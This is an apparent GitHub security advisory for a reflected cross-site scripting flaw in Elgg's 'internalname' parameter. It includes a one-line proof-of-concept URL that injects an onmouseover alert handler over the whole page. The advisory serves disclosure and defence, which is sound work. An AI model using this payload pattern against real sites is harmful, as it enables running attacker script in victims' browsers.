Elgg Reflected XSS Vulnerability
Moderate severity
GitHub Reviewed
Published
Apr 22, 2022
to the GitHub Advisory Database
•
Updated Jan 12, 2024
Description
Published by the National Vulnerability Database
Nov 12, 2019
Published to the GitHub Advisory Database
Apr 22, 2022
Last updated
Jan 12, 2024
Reviewed
Jan 12, 2024
VULNERABILITY DESCRIPTION
The
internalname
parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browserPROOF-OF-CONCEPT/EXPLOIT
http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
References